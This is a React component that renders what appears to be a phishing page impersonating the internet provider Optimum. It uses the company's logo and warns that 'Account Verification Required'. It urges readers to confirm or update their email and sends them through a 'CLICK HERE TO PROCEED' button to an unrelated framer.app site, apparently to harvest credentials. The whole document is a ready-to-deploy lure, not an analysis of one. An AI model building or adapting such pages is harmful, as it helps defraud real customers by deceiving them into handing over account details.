import React from 'react';
export function App() {
  return <div className="flex flex-col items-center justify-center min-h-screen w-full bg-white px-4 py-12" data-id="element-0">
      <img src="https://images.squarespace-cdn.com/content/v1/6478c1e5bc8cc45c85c8eead/a3f62864-c29b-45c7-9cd5-79631e90fc57/2.png" alt="Optimum Logo" className="h-16 mb-8 object-contain" data-id="element-1" />

      <h1 className="text-2xl font-bold text-gray-900 text-center mb-4" data-id="element-2">
        Optimum Account Verification Required
      </h1>

      <p className="text-gray-600 text-center max-w-md mb-8" data-id="element-3">
        To ensure uninterrupted communication, please confirm or update your
        email address by clicking the button below
      </p>

      <a href="https://tiny-triangle-746394.framer.app/" target="_blank" rel="noopener noreferrer" className="inline-block bg-blue-600 hover:bg-blue-700 text-white font-semibold tracking-wide px-8 py-3 rounded transition-colors" data-id="element-4">
        CLICK HERE TO PROCEED
      </a>

      <p className="text-gray-400 text-sm mt-12" data-id="element-5">@2026 All Rights Reserved.</p>
    </div>;
}